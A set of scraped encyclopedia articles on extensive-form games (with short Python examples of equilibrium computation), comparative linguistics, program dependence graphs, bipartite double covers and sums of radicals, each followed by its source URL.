A perfect-information two-player game over a game tree (as defined in combinatorial game theory and artificial intelligence) can be represented as an extensive form game with outcomes (i.e. win, lose, or draw). Examples of such games include tic-tac-toe, chess, and infinite chess.[1][2] A game over an expectminimax tree, like that of backgammon, has no imperfect information (all information sets are singletons) but has moves of chance. For example, poker has both moves of chance (the cards being dealt) and imperfect information (the cards secretly held by other players). (Binmore 2007, chpt. 2)
A complete extensive-form representation specifies:
The game on the right has two players: 1 and 2. The numbers by every non-terminal node indicate to which player that decision node belongs. The numbers by every terminal node represent the payoffs to the players (e.g. 2,1 represents a payoff of 2 to player 1 and a payoff of 1 to player 2). The labels by every edge of the graph are the name of the action that edge represents.
The initial node belongs to player 1, indicating that player 1 moves first. Play according to the tree is as follows: player 1 chooses between U and D; player 2 observes player 1's choice and then chooses between U' and D'. The payoffs are as specified in the tree. There are four outcomes represented by the four terminal nodes of the tree: (U,U'), (U,D'), (D,U') and (D,D'). The payoffs associated with each outcome respectively are as follows: (0,0), (2,1), (1,2) and (3,1).
If player 1 plays D, player 2 will play U' to maximise their payoff, and so player 1 will only receive 1. However, if player 1 plays U, player 2 maximises their payoff by playing D' and player 1 receives 2. Player 1 prefers 2 to 1 and so will play U, and player 2 will play D'. This is the subgame perfect equilibrium.
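This backward-induction argument can be sketched programmatically. The snippet below (the tree encoding is my own illustration) traces the equilibrium path in this perfect-information game; note it recovers the on-path moves and payoff only, not the full strategy profile at off-path nodes:

```python
# Internal nodes are (player, {action: subtree}); leaves are (payoff1, payoff2).
tree = (1, {"U": (2, {"U'": (0, 0), "D'": (2, 1)}),
            "D": (2, {"U'": (1, 2), "D'": (3, 1)})})

def backward_induction(node):
    """Return (moves along the equilibrium path, payoff pair)."""
    if not isinstance(node[1], dict):   # leaf: a plain payoff pair
        return [], node
    player, moves = node
    best_action, best_path, best_pay = None, None, None
    for action, child in moves.items():
        path, pay = backward_induction(child)
        if best_pay is None or pay[player - 1] > best_pay[player - 1]:
            best_action, best_path, best_pay = action, path, pay
    return [best_action] + best_path, best_pay

path, payoff = backward_induction(tree)
print(path, payoff)  # ['U', "D'"] (2, 1)
```

The recursion mirrors the verbal argument: each player-2 subtree is solved first, and player 1 then compares the payoffs those solutions imply.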
An advantage of representing the game in this way is that it is clear what the order of play is. The tree shows clearly that player 1 moves first and player 2 observes this move. However, in some games play does not occur like this. One player does not always observe the choice of another (for example, moves may be simultaneous or a move may be hidden). An information set is a set of decision nodes such that:
In extensive form, an information set is indicated by a dotted line connecting all nodes in that set or sometimes by a loop drawn around all the nodes in that set.
If a game has an information set with more than one member, that game is said to have imperfect information. A game with perfect information is such that at any stage of the game, every player knows exactly what has taken place earlier in the game; i.e. every information set is a singleton set.[1][2] Any game without perfect information has imperfect information.
The game on the right is the same as the above game except that player 2 does not know what player 1 does when they come to play. The first game described has perfect information; the game on the right does not. If both players are rational and both know that both players are rational and everything that is known by any player is known to be known by every player (i.e. player 1 knows player 2 knows that player 1 is rational and player 2 knows this, etc. ad infinitum), play in the first game will be as follows: player 1 knows that if they play U, player 2 will play D' (because for player 2 a payoff of 1 is preferable to a payoff of 0) and so player 1 will receive 2. However, if player 1 plays D, player 2 will play U' (because to player 2 a payoff of 2 is better than a payoff of 1) and player 1 will receive 1. Hence, in the first game, the equilibrium will be (U, D') because player 1 prefers to receive 2 rather than 1 and so will play U, and so player 2 will play D'.
In the second game it is less clear: player 2 cannot observe player 1's move. Player 1 would like to fool player 2 into thinking they have played U when they have actually played D, so that player 2 will play D' and player 1 will receive 3. In fact, in the second game there is a perfect Bayesian equilibrium where player 1 plays D and player 2 plays U', and player 2 holds the belief that player 1 will definitely play D. In this equilibrium, every strategy is rational given the beliefs held and every belief is consistent with the strategies played. Notice how the imperfection of information changes the outcome of the game.
To more easily solve this game for the Nash equilibrium,[3] it can be converted to the normal form.[4] Given this is a simultaneous/sequential game, player one and player two each have two strategies.[5]
We will have a two by two matrix with a unique payoff for each combination of moves. Using the normal form game, it is now possible to solve the game and identify dominant strategies for both players.
These preferences can be marked within the matrix, and any box where both players have a preference provides a Nash equilibrium. This particular game has a single solution of (D, U') with a payoff of (1,2).
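The best-response check over the normal-form matrix can be sketched as follows (the dictionary encoding is illustrative). A pure-strategy profile is a Nash equilibrium exactly when neither player can gain by deviating unilaterally, and the search confirms (D, U') as the unique such profile here:

```python
# Normal form of the imperfect-information game: payoffs[(s1, s2)] = (u1, u2).
payoffs = {("U", "U'"): (0, 0), ("U", "D'"): (2, 1),
           ("D", "U'"): (1, 2), ("D", "D'"): (3, 1)}
S1, S2 = ("U", "D"), ("U'", "D'")

def is_nash(s1, s2):
    """True if neither player gains by a unilateral deviation."""
    u1, u2 = payoffs[(s1, s2)]
    no_dev1 = all(payoffs[(t, s2)][0] <= u1 for t in S1)
    no_dev2 = all(payoffs[(s1, t)][1] <= u2 for t in S2)
    return no_dev1 and no_dev2

equilibria = [(s1, s2) for s1 in S1 for s2 in S2 if is_nash(s1, s2)]
print(equilibria)  # [('D', "U'")]
```

Contrast this with the subgame perfect equilibrium (U, D') of the perfect-information version: removing player 2's ability to observe the move changes the predicted outcome.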
In games with infinite action spaces and imperfect information, non-singleton information sets are represented, if necessary, by inserting a dotted line connecting the (non-nodal) endpoints behind the arc described above or by dashing the arc itself. In the Stackelberg competition described above, if the second player had not observed the first player's move the game would no longer fit the Stackelberg model; it would be Cournot competition.
It may be the case that a player does not know exactly what the payoffs of the game are or of what type their opponents are. This sort of game has incomplete information. In extensive form it is represented as a game with complete but imperfect information using the so-called Harsanyi transformation. This transformation introduces to the game the notion of nature's choice or God's choice. Consider a game consisting of an employer considering whether to hire a job applicant. The job applicant's ability might be one of two things: high or low. Their ability level is random; they either have low ability with probability 1/3 or high ability with probability 2/3. In this case, it is convenient to model nature as another player of sorts who chooses the applicant's ability according to those probabilities. Nature however does not have any payoffs. Nature's choice is represented in the game tree by a non-filled node. Edges coming from a nature's choice node are labelled with the probability of the event it represents occurring.
The game on the left is one of complete information (all the players and payoffs are known to everyone) but of imperfect information (the employer doesn't know what nature's move was). The initial node is in the centre and it is not filled, so nature moves first. Nature selects with the same probability the type of player 1 (which in this game is tantamount to selecting the payoffs in the subgame played), either t1 or t2. Player 1 has distinct information sets for these; i.e. player 1 knows what type they are (this need not be the case). However, player 2 does not observe nature's choice. They do not know the type of player 1; however, in this game they do observe player 1's actions; i.e. there is perfect information. Indeed, it is now appropriate to alter the above definition of complete information: at every stage in the game, every player knows what has been played by the other players. In the case of private information, every player knows what has been played by nature. Information sets are represented as before by broken lines.
In this game, if nature selects t1 as player 1's type, the game played will be like the very first game described, except that player 2 does not know it (and the very fact that this cuts through their information sets disqualifies it from subgame status). There is one separating perfect Bayesian equilibrium; i.e. an equilibrium in which different types do different things.
If both types play the same action (pooling), an equilibrium cannot be sustained. If both play D, player 2 can only form the belief that they are on either node in the information set with probability 1/2 (because this is the chance of seeing either type). Player 2 maximises their payoff by playing D'. However, if they play D', type 2 would prefer to play U. This cannot be an equilibrium. If both types play U, player 2 again forms the belief that they are at either node with probability 1/2. In this case player 2 plays D', but then type 1 prefers to play D.
If type 1 plays U and type 2 plays D, player 2 will play D' whatever action they observe, but then type 1 prefers D. The only equilibrium hence is with type 1 playing D, type 2 playing U and player 2 playing U' if they observe D and randomising if they observe U. Through their actions, player 1 has signalled their type to player 2.
Formally, a finite game in extensive form is a structure Γ = ⟨K, H, [(H_i)_{i∈I}], {A(H)}_{H∈H}, a, ρ, u⟩ where:
for all H ∈ H and all v ∈ H, the restriction a_v : s(v) → A(H) of a to s(v) is a bijection, with s(v) the set of successor nodes of v.
It may be that a player has an infinite number of possible actions to choose from at a particular decision node. The device used to represent this is an arc joining two edges protruding from the decision node in question. If the action space is a continuum between two numbers, the lower and upper delimiting numbers are placed at the bottom and top of the arc respectively, usually with a variable that is used to express the payoffs. The infinite number of decision nodes that could result are represented by a single node placed in the centre of the arc. A similar device is used to represent action spaces that, whilst not infinite, are large enough to prove impractical to represent with an edge for each action.
The tree on the left represents such a game, either with infinite action spaces (any real number between 0 and 5000) or with very large action spaces (perhaps any integer between 0 and 5000). This would be specified elsewhere. Here, it will be supposed that it is the former and, for concreteness, that it represents two firms engaged in Stackelberg competition. The payoffs to the firms are represented on the left, with q1 and q2 as the strategies they adopt and c1 and c2 as constants (here the marginal costs of each firm). The subgame perfect Nash equilibria of this game can be found by taking the first partial derivative[citation needed] of each payoff function with respect to the follower's (firm 2) strategy variable q2 and finding its best response function, q2(q1) = (5000 − q1 − c2)/2. The same process can be done for the leader, except that in calculating its profit it knows that firm 2 will play the above response, so this can be substituted into its maximisation problem. It can then solve for q1 by taking the first derivative, yielding q1* = (5000 + c2 − 2c1)/2. Feeding this into firm 2's best response function gives q2* = (5000 + 2c1 − 3c2)/4, and (q1*, q2*) is the subgame perfect Nash equilibrium.
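The backward induction above can be checked numerically. A minimal sketch, assuming the inverse-demand form P(Q) = 5000 − q1 − q2 with constant marginal costs c1 and c2 (the exact payoff functions are not given here, so this parameterisation is an illustrative assumption):

```python
# Sketch of backward induction for assumed Stackelberg payoffs
# profit_i = q_i * (5000 - q1 - q2 - c_i); numbers are illustrative.
def follower_best_response(q1, c2):
    # From d(profit_2)/d(q2) = 0: q2(q1) = (5000 - q1 - c2) / 2
    return (5000 - q1 - c2) / 2

def stackelberg_equilibrium(c1, c2):
    # The leader substitutes the follower's response into its own profit
    # and maximises, giving q1* = (5000 + c2 - 2*c1) / 2 as derived above.
    q1 = (5000 + c2 - 2 * c1) / 2
    q2 = follower_best_response(q1, c2)  # equals (5000 + 2*c1 - 3*c2) / 4
    return q1, q2

q1, q2 = stackelberg_equilibrium(100, 100)
print(q1, q2)  # 2450.0 1225.0
```

With equal costs the leader produces twice the follower's quantity, the familiar first-mover advantage of Stackelberg competition.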
|
https://en.wikipedia.org/wiki/Extensive-form_game
|
Comparative linguistics is a branch of historical linguistics that is concerned with comparing languages to establish their historical relatedness.
Genetic relatedness implies a common origin or proto-language, and comparative linguistics aims to construct language families, to reconstruct proto-languages and to specify the changes that have resulted in the documented languages. To maintain a clear distinction between attested and reconstructed forms, comparative linguists prefix an asterisk to any form that is not found in surviving texts. A number of methods for carrying out language classification have been developed, ranging from simple inspection to computerised hypothesis testing. Such methods have gone through a long process of development.
The fundamental technique of comparative linguistics is to compare phonological systems, morphological systems, syntax and the lexicon of two or more languages using techniques such as the comparative method. In principle, every difference between two related languages should be explicable to a high degree of plausibility; systematic changes, for example in phonological or morphological systems, are expected to be highly regular (consistent). In practice, the comparison may be more restricted, e.g. just to the lexicon. In some methods it may be possible to reconstruct an earlier proto-language. Although the proto-languages reconstructed by the comparative method are hypothetical, a reconstruction may have predictive power. The most notable example of this is Ferdinand de Saussure's proposal that the Indo-European consonant system contained laryngeals, a type of consonant attested in no Indo-European language known at the time. The hypothesis was vindicated with the discovery of Hittite, which proved to have exactly the consonants Saussure had hypothesized in the environments he had predicted.
Where languages are derived from a very distant ancestor, and are thus more distantly related, the comparative method becomes less practicable.[1] In particular, attempting to relate two reconstructed proto-languages by the comparative method has not generally produced results that have met with wide acceptance.[citation needed] The method has also not been very good at unambiguously identifying sub-families; thus, different scholars[who?] have produced conflicting results, for example in Indo-European.[citation needed] A number of methods based on statistical analysis of vocabulary have been developed to try to overcome this limitation, such as lexicostatistics and mass comparison. The former uses lexical cognates like the comparative method, while the latter uses only lexical similarity. The theoretical basis of such methods is that vocabulary items can be matched without a detailed language reconstruction and that comparing enough vocabulary items will negate individual inaccuracies; thus, they can be used to determine relatedness but not to determine the proto-language.
The earliest method of this type was the comparative method, which was developed over many years, culminating in the nineteenth century. This uses a long word list and detailed study. However, it has been criticized, for example, as subjective, informal, and lacking testability.[2] The comparative method uses information from two or more languages and allows reconstruction of the ancestral language. The method of internal reconstruction uses only a single language, with comparison of word variants, to perform the same function. Internal reconstruction is more resistant to interference but usually has a limited available base of utilizable words and is able to reconstruct only certain changes (those that have left traces as morphophonological variations).
In the twentieth century an alternative method, lexicostatistics, was developed, which is mainly associated with Morris Swadesh but is based on earlier work. This uses a short word list of basic vocabulary in the various languages for comparisons. Swadesh used 100 (earlier 200) items that are assumed to be cognate (on the basis of phonetic similarity) in the languages being compared, though other lists have also been used. Distance measures are derived by examination of language pairs, but such methods reduce the information. An outgrowth of lexicostatistics is glottochronology, initially developed in the 1950s, which proposed a mathematical formula for establishing the date when two languages separated, based on the percentage of a core vocabulary of culturally independent words. In its simplest form a constant rate of change is assumed, though later versions allow variance but still fail to achieve reliability. Glottochronology has met with mounting scepticism and is seldom applied today. Dating estimates can now be generated by computerised methods that have fewer restrictions, calculating rates from the data. However, no mathematical means of producing proto-language split-times on the basis of lexical retention has been proven reliable.
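The constant-rate formula of classic glottochronology can be stated compactly. The sketch below uses the commonly cited retention rate of about 86% per millennium for the Swadesh 100-word list; both the rate and the formula t = log c / (2 log r) are the textbook simplification, not a reliable dating method, as noted above:

```python
import math

def split_time(c, r=0.86):
    # c: proportion of shared cognates between the two languages (0 < c <= 1)
    # r: assumed retention rate of the core list per millennium
    # Each lineage decays independently, so c = r**(2*t); solving for t:
    return math.log(c) / (2 * math.log(r))  # time depth in millennia

# Two languages sharing 74% cognates split roughly a millennium ago
# under these assumptions.
print(round(split_time(0.74), 2))
```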
Another controversial method, developed by Joseph Greenberg, is mass comparison.[3] The method, which disavows any ability to date developments, aims simply to show which languages are more and less close to each other. Greenberg suggested that the method is useful for preliminary grouping of languages known to be related as a first step toward more in-depth comparative analysis.[4] However, since mass comparison eschews the establishment of regular changes, it is flatly rejected by the majority of historical linguists.[5]
Recently, computerised statistical hypothesis-testing methods have been developed which are related to both the comparative method and lexicostatistics. Character-based methods are similar to the former and distance-based methods are similar to the latter (see Quantitative comparative linguistics). The characters used can be morphological or grammatical as well as lexical.[6] Since the mid-1990s these more sophisticated tree- and network-based phylogenetic methods have been used to investigate the relationships between languages and to determine approximate dates for proto-languages. These are considered by many to show promise but are not wholly accepted by traditionalists.[7] However, they are not intended to replace older methods but to supplement them.[8] Such statistical methods cannot be used to derive the features of a proto-language, apart from the fact of the existence of shared items of the compared vocabulary. These approaches have been challenged for their methodological problems, since without a reconstruction or at least a detailed list of phonological correspondences there can be no demonstration that two words in different languages are cognate.[citation needed]
There are other branches of linguistics that involve comparing languages which are not, however, part of comparative linguistics.
Comparative linguistics proper studies the historical relationships of languages using the comparative method, searching for regular (i.e., recurring) correspondences between the languages' phonology, grammar, and core vocabulary, and testing hypotheses by examining specific patterns of similarity and difference across languages. By contrast, some persons with little or no specialization in the field sometimes attempt to establish historical associations between languages merely by noting similarities between them, in a way that is considered pseudoscientific by specialists (e.g. spurious comparisons between Ancient Egyptian and languages like Wolof, as proposed by Diop in the 1960s[9]).
The most common method applied in pseudoscientific language comparisons is to search two or more languages for words that seem similar in their sound and meaning. While similarities of this kind often seem convincing to laypersons, linguists consider this kind of comparison unreliable for two primary reasons. First, the method applied is not well defined: the criterion of similarity is subjective and thus not subject to verification or falsification, contrary to the principles of the scientific method. Second, the large size of all languages' vocabulary and the relatively limited inventory of articulated sounds used by most languages make it easy to find coincidentally similar words between languages.[citation needed][10]
There are sometimes political or religious reasons for associating languages in ways that some linguists would dispute. For example, it has been suggested that the Turanian or Ural–Altaic language group, which relates Sami and other languages to the Mongolian language, was used to justify racism towards the Sami in particular.[11] There are also strong, albeit areal, not genetic, similarities between the Uralic and Altaic languages, which provided an innocent basis for this theory. In 1930s Turkey, some promoted the Sun Language Theory, which held that Turkic languages were close to the original language. Some believers in Abrahamic religions try to derive their native languages from Classical Hebrew; Herbert W. Armstrong, a proponent of British Israelism, said that the word British comes from Hebrew brit meaning 'covenant' and ish meaning 'man', supposedly proving that the British people are the 'covenant people' of God. The Lithuanian-American archaeologist Marija Gimbutas argued during the mid-1900s that Basque is clearly related to the extinct Pictish and Etruscan languages, in an attempt to show that Basque was a remnant of an "Old European culture".[12] In the Dissertatio de origine gentium Americanarum (1625), the Dutch lawyer Hugo Grotius "proves" that the American Indians (Mohawks) speak a language (lingua Maquaasiorum) derived from Scandinavian languages (Grotius was on Sweden's payroll), supporting Swedish colonial pretensions in America.
The Dutch doctor Johannes Goropius Becanus, in his Origines Antverpiana (1580), admits Quis est enim qui non amet patrium sermonem ("Who does not love his fathers' language?"), whilst asserting that Hebrew is derived from Dutch. The Frenchman Éloi Johanneau claimed in 1818 (Mélanges d'origines étymologiques et de questions grammaticales) that the Celtic language is the oldest and the mother of all others.
In 1759, Joseph de Guignes theorized (Mémoire dans lequel on prouve que les Chinois sont une colonie égyptienne) that the Chinese and Egyptians were related, the former being a colony of the latter, just as Becanus, in his Hieroglyphica, had related Egyptian to Brabantic, still using comparative methods. In 1885, Edward Tregear (The Aryan Maori) compared the Maori and "Aryan" languages. Jean Prat, in his 1941 Les langues nitales, claimed that the Bantu languages of Africa are descended from Latin, coining the French linguistic term nitale in doing so.
The first practitioners of comparative linguistics were not universally acclaimed: upon reading Becanus' book, Scaliger wrote, "never did I read greater nonsense", and Leibniz coined the term goropism (from Goropius) to designate a far-fetched, ridiculous etymology.
There have also been assertions that humans are descended from non-primate animals, with the use of the voice being the primary basis for comparison. Jean-Pierre Brisset (in La Grande Nouvelle, around 1900) claimed that humans evolved from frogs through linguistic connections, arguing that the croaking of frogs resembles spoken French. He suggested that the French word logement, meaning 'dwelling', originated from the word l'eau, meaning 'water'.[13]
|
https://en.wikipedia.org/wiki/Comparative_linguistics
|
A Program Dependence Graph (PDG) is a directed graph of a program's control and data dependencies. Nodes represent program statements and edges represent dependencies between these statements.
PDGs are used in optimization, debugging, and understanding program behavior. One example of this is their use by compilers during dependence analysis, enabling the optimizing compiler to make transformations that allow for parallelism.[1][2]
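As an illustrative sketch (not tied to any particular compiler's internal representation), a PDG can be stored as a labelled edge list; the four-statement program in the comments is hypothetical:

```python
from collections import defaultdict

# Hypothetical four-statement program:
#   S1: a = read()
#   S2: b = a + 1
#   S3: if a > 0:
#   S4:     c = b * 2
class PDG:
    def __init__(self):
        self.edges = defaultdict(list)  # statement -> [(dependent, kind)]

    def add_dependence(self, src, dst, kind):
        # kind is "data" (dst uses a value defined at src) or
        # "control" (whether dst executes is decided by the branch at src)
        self.edges[src].append((dst, kind))

    def dependents(self, node, kind=None):
        return [d for d, k in self.edges[node] if kind is None or k == kind]

pdg = PDG()
pdg.add_dependence("S1", "S2", "data")     # S2 uses `a` defined at S1
pdg.add_dependence("S1", "S3", "data")     # the branch condition uses `a`
pdg.add_dependence("S2", "S4", "data")     # S4 uses `b` defined at S2
pdg.add_dependence("S3", "S4", "control")  # S4 runs only on the true branch

print(pdg.dependents("S1"))             # ['S2', 'S3']
print(pdg.dependents("S3", "control"))  # ['S4']
```

Statements with no path between them in the PDG (here S2 and S3) have no ordering constraint on each other, which is the property dependence analysis exploits when exposing parallelism.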
|
https://en.wikipedia.org/wiki/Program_dependence_graph
|
In graph theory, the bipartite double cover of an undirected graph G is a bipartite covering graph of G, with twice as many vertices as G. It can be constructed as the tensor product of graphs, G × K2. It is also called the Kronecker double cover, canonical double cover or simply the bipartite double of G.
It should not be confused with a cycle double cover of a graph, a family of cycles that includes each edge twice.
The bipartite double cover of G has two vertices ui and wi for each vertex vi of G. Two vertices ui and wj are connected by an edge in the double cover if and only if vi and vj are connected by an edge in G. For instance, below is an illustration of a bipartite double cover of a non-bipartite graph G. In the illustration, each vertex in the tensor product is shown using a color from the first term of the product (G) and a shape from the second term of the product (K2); therefore, the vertices ui in the double cover are shown as circles while the vertices wi are shown as squares.
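The construction just described translates directly into code. A minimal sketch using an adjacency-set representation (the vertex labelling and the triangle example are illustrative):

```python
def bipartite_double_cover(adj):
    # adj: dict mapping each vertex to the set of its neighbours in G.
    # The cover has vertices (v, 0) ("u_i") and (v, 1) ("w_i");
    # (u, 0) is adjacent to (w, 1) exactly when u and w are adjacent in G.
    cover = {}
    for v, nbrs in adj.items():
        cover[(v, 0)] = {(w, 1) for w in nbrs}
        cover[(v, 1)] = {(w, 0) for w in nbrs}
    return cover

# The triangle is non-bipartite; its double cover is the 6-cycle.
triangle = {0: {1, 2}, 1: {0, 2}, 2: {0, 1}}
cover = bipartite_double_cover(triangle)
print(len(cover))             # 6
print(sorted(cover[(0, 0)]))  # [(1, 1), (2, 1)]
```

Every edge of the cover joins a side-0 vertex to a side-1 vertex, so the result is bipartite by construction.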
The bipartite double cover may also be constructed using adjacency matrices (as described below) or as the derived graph of a voltage graph in which each edge of G is labeled by the nonzero element of the two-element group.
The bipartite double cover of the Petersen graph is the Desargues graph: K2 × G(5,2) = G(10,3).
The bipartite double cover of a complete graph Kn is a crown graph (a complete bipartite graph Kn,n minus a perfect matching). In particular, the bipartite double cover of the graph of a tetrahedron, K4, is the graph of a cube.
The bipartite double cover of an odd-length cycle graph is a cycle of twice the length, while the bipartite double of any bipartite graph (such as an even-length cycle, shown in the following example) is formed by two disjoint copies of the original graph.
If an undirected graph G has a matrix A as its adjacency matrix, then the adjacency matrix of the double cover of G is the block matrix

{\displaystyle {\begin{pmatrix}0&A\\A^{\mathsf {T}}&0\end{pmatrix}}}

(with A^T = A, since G is undirected),
and the biadjacency matrix of the double cover of G is just A itself. That is, the conversion from a graph to its double cover can be performed simply by reinterpreting A as a biadjacency matrix instead of as an adjacency matrix. More generally, the reinterpretation of the adjacency matrices of directed graphs as biadjacency matrices provides a combinatorial equivalence between directed graphs and balanced bipartite graphs.[1]
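The matrix construction is a few lines of code. The sketch below builds the block matrix [[0, A], [Aᵀ, 0]] for an undirected graph and shows that its upper-right block, the biadjacency matrix, is A itself (plain nested lists; the triangle K3 is an illustrative input):

```python
def double_cover_adjacency(A):
    # A: symmetric 0/1 adjacency matrix of an undirected graph G.
    n = len(A)
    M = [[0] * (2 * n) for _ in range(2 * n)]
    for i in range(n):
        for j in range(n):
            M[i][n + j] = A[i][j]  # upper-right block: the biadjacency matrix A
            M[n + i][j] = A[j][i]  # lower-left block: A transposed (= A here)
    return M

A = [[0, 1, 1], [1, 0, 1], [1, 1, 0]]  # K3, a triangle
M = double_cover_adjacency(A)
print(M[0])  # [0, 0, 0, 0, 1, 1]
```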
The bipartite double cover of any graph G is a bipartite graph; both parts of the bipartite graph have one vertex for each vertex of G. A bipartite double cover is connected if and only if G is connected and non-bipartite.[2]
The bipartite double cover is a special case of a double cover (a 2-fold covering graph). A double cover in graph theory can be viewed as a special case of a topological double cover.
If G is a non-bipartite symmetric graph, the double cover of G is also a symmetric graph; several known cubic symmetric graphs may be obtained in this way. For instance, the double cover of K4 is the graph of a cube; the double cover of the Petersen graph is the Desargues graph; and the double cover of the graph of the dodecahedron is a 40-vertex symmetric cubic graph.[3]
It is possible for two different graphs to have isomorphic bipartite double covers. For instance, the Desargues graph is not only the bipartite double cover of the Petersen graph, but is also the bipartite double cover of a different graph that is not isomorphic to the Petersen graph.[4] Not every bipartite graph is a bipartite double cover of another graph; for a bipartite graph G to be the bipartite double cover of another graph, it is necessary and sufficient that the automorphisms of G include an involution that maps each vertex to a distinct and non-adjacent vertex.[4] For instance, the graph with two vertices and one edge is bipartite but is not a bipartite double cover, because it has no non-adjacent pairs of vertices to be mapped to each other by such an involution; on the other hand, the graph of the cube is a bipartite double cover, and has an involution that maps each vertex to the diametrically opposite vertex. An alternative characterization of the bipartite graphs that may be formed by the bipartite double cover construction was obtained by Sampathkumar (1975).
In a connected graph that is not bipartite, only one double cover is bipartite, but when the graph is bipartite or disconnected there may be more than one. For this reason, Tomaž Pisanski has argued that the name "bipartite double cover" should be deprecated in favor of the "canonical double cover" or "Kronecker cover", names which are unambiguous.[5]
In general, a graph may have multiple double covers that are different from the bipartite double cover.[6]
In the following figure, the graph C is a double cover of the graph H:
However, C is not the bipartite double cover of H or any other graph; it is not a bipartite graph.
If we replace one triangle by a square in H, the resulting graph has four distinct double covers. Two of them are bipartite, but only one of them is the Kronecker cover.
As another example, the graph of the icosahedron is a double cover of the complete graph K6; to obtain a covering map from the icosahedron to K6, map each pair of opposite vertices of the icosahedron to a single vertex of K6. However, the icosahedron is not bipartite, so it is not the bipartite double cover of K6. Instead, it can be obtained as the orientable double cover of an embedding of K6 on the projective plane.
The double covers of a graph correspond to the different ways to sign the edges of the graph.
|
https://en.wikipedia.org/wiki/Bipartite_double_cover
|
In mathematics, a sum of radicals is defined as a finite linear combination of nth roots:

{\displaystyle \sum _{i=1}^{n}k_{i}{\sqrt[{r_{i}}]{x_{i}}}}

where n, ri are natural numbers and ki, xi are real numbers.
A particular special case arising in computational complexity theory is the square-root sum problem, asking whether it is possible to determine the sign of a sum of square roots, with integer coefficients, in polynomial time. This is of importance for many problems in computational geometry, since the computation of the Euclidean distance between two points in the general case involves the computation of a square root, and therefore the perimeter of a polygon or the length of a polygonal chain takes the form of a sum of radicals.[1]
In 1991, Blömer proposed a polynomial-time Monte Carlo algorithm for determining whether a sum of radicals is zero, or more generally whether it represents a rational number.[2] Blömer's result applies more generally than the square-root sum problem, to sums of radicals that are not necessarily square roots. However, his algorithm does not solve the problem, because it does not determine the sign of a non-zero sum of radicals.[2]
|
https://en.wikipedia.org/wiki/Sum_of_radicals
|